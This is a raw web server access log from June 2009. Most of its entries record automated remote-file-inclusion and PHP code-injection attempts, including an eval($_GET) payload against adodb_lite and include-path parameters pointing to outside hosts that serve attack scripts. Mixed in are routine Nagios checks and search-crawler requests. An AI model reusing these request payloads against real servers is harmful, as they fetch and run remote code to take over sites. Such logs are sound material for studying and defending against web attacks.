195.34.78.110 - - [28/Jun/2009:03:38:32 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:32 -0400] "GET /logs/access_log.Q109051900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:38:40 -0400] "GET /logs/access_log.Q109053000%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:03:39:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.16 - - [28/Jun/2009:03:39:32 -0400] "GET /images/items/682474_full.jpg HTTP/1.1" 200 8325 "-" "Googlebot-Image/1.0"
217.125.38.117 - - [28/Jun/2009:03:40:03 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.125.38.117 - - [28/Jun/2009:03:40:03 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.125.38.117 - - [28/Jun/2009:03:40:56 -0400] "GET /logs/access_log.Q109060800%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:03:41:47 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:03:41:47 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 7320 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:03:41:47 -0400] "GET /logs/access_log.Q109051600///?_SERVER[DOCUMENT_ROOT]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:03:42:15 -0400] "GET /logs/access_log.Q109061900///?_SERVER[DOCUMENT_ROOT]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:03:42:32 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:03:42:32 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 7320 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:03:42:32 -0400] "GET /logs/access_log.Q109062000///?_SERVER[DOCUMENT_ROOT]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:03:42:59 -0400] "GET /logs/access_log.Q109052400///?_SERVER[DOCUMENT_ROOT]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:43:40 -0400] "GET /logs/access_log.Q109061300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:43:40 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:03:44:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.243.139.4 - - [28/Jun/2009:03:44:14 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:03:44:14 -0400] "GET /logs/access_log.Q109051700//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:03:44:14 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 7319 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:03:44:50 -0400] "GET /logs/access_log.Q109061300//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:03:45:15 -0400] "GET /logs/access_log.Q107122300 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.125.38.117 - - [28/Jun/2009:03:48:27 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.125.38.117 - - [28/Jun/2009:03:48:30 -0400] "GET /logs/access_log.Q109061300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:03:49:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.131.116.12 - - [28/Jun/2009:03:49:38 -0400] "GET /logs/access_log.Q109051800//twindow_notice.php?shop_this_skin_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:03:49:38 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:03:49:38 -0400] "GET /logs//twindow_notice.php?shop_this_skin_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
193.243.139.4 - - [28/Jun/2009:03:49:40 -0400] "GET /logs/access_log.Q109051700%20%20//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:03:49:46 -0400] "GET /logs/access_log.Q109051800//twindow_notice.php?shop_this_skin_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:03:49:46 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:03:49:46 -0400] "GET /logs//twindow_notice.php?shop_this_skin_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
193.243.139.4 - - [28/Jun/2009:03:49:57 -0400] "GET /logs/access_log.Q109061300%20%20//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:03:50:06 -0400] "GET /logs/access_log.Q109061300//twindow_notice.php?shop_this_skin_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:03:50:07 -0400] "GET /logs/access_log.Q109061300//twindow_notice.php?shop_this_skin_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
77.232.68.137 - - [28/Jun/2009:03:52:25 -0400] "GET //?path%5Bdocroot%5D=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:52:28 -0400] "GET /logs/access_log.Q109061300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:03:52:28 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:03:52:30 -0400] "GET /logs//?path%5Bdocroot%5D=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 200 7319 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:03:52:30 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:03:52:37 -0400] "GET /logs/access_log.Q109051200%20%20//?path%5Bdocroot%5D=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:53:54 -0400] "GET //atom.php5?page=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:03:53:54 -0400] "GET /logs//atom.php5?page=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:03:53:54 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:03:53:54 -0400] "GET /logs/error_log.Q109052300//atom.php5?page=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jun/2009:03:54:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.206.120.187 - - [28/Jun/2009:03:55:14 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:03:55:14 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:56:08 -0400] "GET /logs/access_log.Q109051100//components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:03:56:08 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:03:56:08 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:03:57:04 -0400] "GET /logs//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:57:04 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:57:04 -0400] "GET //include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:03:57:17 -0400] "GET /logs/access_log.Q108051000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.142.148.142 - - [28/Jun/2009:03:58:22 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:03:58:22 -0400] "GET /logs/include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:58:38 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:58:39 -0400] "GET /logs//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:58:39 -0400] "GET //include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:58:39 -0400] "GET //include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:58:39 -0400] "GET /logs//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:03:58:39 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:03:58:44 -0400] "GET /logs/error_log.Q109052800/include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:03:59:12 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:03:59:12 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:03:59:12 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:03:59:14 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
211.202.2.220 - - [28/Jun/2009:03:59:28 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:03:59:32 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:03:59:32 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:03:59:43 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
200.142.148.142 - - [28/Jun/2009:04:00:29 -0400] "GET /logs/access_log.Q109052800%20%20/include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.142.148.142 - - [28/Jun/2009:04:00:30 -0400] "GET /logs/error_log.Q109052800%20%20/include/lib.inc.php?site_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jun/2009:04:00:44 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:00:44 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:00:44 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:00:52 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:00:56 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:00:56 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:01:01 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:01:04 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
209.59.12.99 - - [28/Jun/2009:04:01:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.125.5.1 - - [28/Jun/2009:04:02:47 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jun/2009:04:02:58 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:03:02 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.206.120.187 - - [28/Jun/2009:04:03:26 -0400] "GET /logs/access_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:04:03:29 -0400] "GET /logs/error_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:03:29 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:03:31 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:03:31 -0400] "GET /logs/access_log.Q109062500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
218.234.21.178 - - [28/Jun/2009:04:03:34 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:03:34 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:03:34 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:03:38 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
125.131.116.12 - - [28/Jun/2009:04:03:49 -0400] "GET /logs/error_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:03:49 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:03:51 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:03:53 -0400] "GET /logs/access_log.Q109062500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
218.234.21.178 - - [28/Jun/2009:04:04:10 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:04:10 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:04:10 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:04:14 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
59.125.5.1 - - [28/Jun/2009:04:04:22 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:04:05:24 -0400] "GET /index.htm HTTP/1.0" 200 870 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.29.190 - - [28/Jun/2009:04:05:57 -0400] "GET ///?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:04:05:57 -0400] "GET /logs///?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 7320 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:04:06:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [28/Jun/2009:04:06:19 -0400] "GET /logs/access_log.Q109050800///?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:04:07:09 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:04:07:14 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.230.156.161 - - [28/Jun/2009:04:07:24 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
